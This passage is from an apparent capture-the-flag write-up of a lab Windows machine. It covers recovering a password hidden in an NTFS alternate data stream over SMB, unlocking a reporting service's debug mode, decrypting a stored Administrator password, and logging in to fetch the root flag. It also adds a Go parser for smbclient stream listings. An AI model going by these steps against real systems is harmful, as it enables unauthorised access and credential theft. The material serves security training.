getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as Debug Mode Password.txt:Password (0,0 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\> 

# cat Debug\ Mode\ Password.txt:Password
WBQ201953D8w
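The listing explains what ls hid: the file's default ::$DATA stream is empty, and the 15-byte password lives in an NTFS alternate data stream named Password, which smbclient only shows through allinfo. The following added example (not from the original writeup) parses an smbclient transcript and reports every named stream, the check a reviewer of a share would run before trusting the sizes shown by ls; the transcript is a constructed sample modelled on the one above, and FindNamedStreams and NamedStream are my own names.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// NamedStream is one alternate data stream reported by smbclient's allinfo.
type NamedStream struct {
	File  string // file the allinfo command was run against
	Name  string // stream name as printed, e.g. ":Password:$DATA"
	Bytes int
}

// Constructed sample transcript (two allinfo calls). Only the size of the
// default stream appears in an ls listing, so a 0-byte file can still carry data.
const sampleSession = `smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    vie ago  9 01:06:12 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> allinfo "HQK_Config_Backup.xml"
attributes: A (20)
stream: [::$DATA], 249 bytes
smb: \C.Smith\HQK Reporting\> 
`

var (
	// the allinfo command line, with or without quotes around the file name
	allinfoRe = regexp.MustCompile(`allinfo\s+"?([^"]+?)"?\s*$`)
	// stream: [<name>], <n> bytes
	streamRe = regexp.MustCompile(`^stream:\s*\[(.*?)\],\s*(\d+)\s*bytes`)
)

// FindNamedStreams walks the transcript and returns every stream other than
// the unnamed default "::$DATA"; those are the ones ls and a plain get never show.
func FindNamedStreams(transcript string) []NamedStream {
	var found []NamedStream
	current := ""
	sc := bufio.NewScanner(strings.NewReader(transcript))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if m := allinfoRe.FindStringSubmatch(line); m != nil {
			current = m[1] // subsequent stream lines belong to this file
			continue
		}
		m := streamRe.FindStringSubmatch(line)
		if m == nil || m[1] == "::$DATA" {
			continue
		}
		n, _ := strconv.Atoi(m[2]) // \d+ already guarantees a number
		found = append(found, NamedStream{File: current, Name: m[1], Bytes: n})
	}
	return found
}

func main() {
	for _, s := range FindNamedStreams(sampleSession) {
		// smbclient can retrieve such a stream with: get "<file>:<streamname>"
		fmt.Printf("%s hides stream %s (%d bytes)\n", s.File, s.Name, s.Bytes)
	}
}
```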
We also download another file that looks interesting:
smb: \C.Smith\HQK Reporting\> get HQK_Config_Backup.xml
getting file \C.Smith\HQK Reporting\HQK_Config_Backup.xml of size 249 as HQK_Config_Backup.xml (1,1 KiloBytes/sec) (average 0,2 KiloBytes/sec)
And we see that it gives the service port as 4386, the one we saw earlier in the nmap scan:
# cat HQK_Config_Backup.xml
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>4386</Port>
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>
We try connecting with telnet on that port and find the HQK Reporting Service, version 1.2, which we can use to read files:
# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>
We enable debug mode with the password we obtained and gain access to the existing directories and files:
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>
We look through the directories and find a password in the file Ldap.conf inside the LDAP directory:
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
>
To decrypt it, we download the HqkLdap.exe file with smbclient and use dnSpy to analyse it.
smb: \> cd "C.Smith\HQK Reporting\AD Integration Module"
smb: \C.Smith\HQK Reporting\AD Integration Module\> ls
  .                                   D        0  Fri Aug  9 14:18:42 2019
  ..                                  D        0  Fri Aug  9 14:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 01:41:16 2019

		10485247 blocks of size 4096. 6543366 blocks available
smb: \C.Smith\HQK Reporting\AD Integration Module\> get HqkLdap.exe
getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (40,7 KiloBytes/sec) (average 40,7 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\AD Integration Module\> 
We edit the code of HqkLdap.exe to obtain the data we need and recover the Administrator user's password in cleartext.
Getting the root flag
Now that we have the Administrator user's password in cleartext, all that is left is to log in as that user and find the root flag.
# smbclient \\\\10.10.10.178\\c$ -U Administrator
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Tue Jul 14 04:34:39 2009
  Boot                              DHS        0  Sat Jan 25 22:15:35 2020
  bootmgr                          AHSR   383786  Sat Nov 20 05:40:08 2010
  BOOTSECT.BAK                     AHSR     8192  Tue Aug  6 07:16:26 2019
  Config.Msi                        DHS        0  Sat Jan 25 22:49:12 2020
  Documents and Settings            DHS        0  Tue Jul 14 07:06:44 2009
  pagefile.sys                      AHS 2146881536  Fri May  8 06:33:02 2020
  PerfLogs                            D        0  Tue Jul 14 05:20:08 2009
  Program Files                      DR        0  Thu Aug  8 01:40:50 2019
  Program Files (x86)                DR        0  Tue Jul 14 07:06:53 2009
  ProgramData                        DH        0  Mon Aug  5 22:24:41 2019
  Recovery                          DHS        0  Mon Aug  5 22:22:25 2019
  restartsvc.bat                      A       33  Thu Aug  8 01:43:09 2019
  Shares                              D        0  Tue Aug  6 15:59:55 2019
  System Volume Information         DHS        0  Tue Aug  6 06:17:38 2019
  Users                              DR        0  Thu Aug  8 19:19:40 2019
  Windows                             D        0  Sat Jan 25 22:22:42 2020

		10485247 blocks of size 4096. 6543364 blocks available
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 08:20:50 2020
  ..                                 DR        0  Sun Jan 26 08:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 23:02:44 2020
  root.txt                            A       32  Tue Aug  6 00:27:26 2019

		10485247 blocks of size 4096. 6543364 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> 
And with that we have our root flag, completing this machine and earning our points.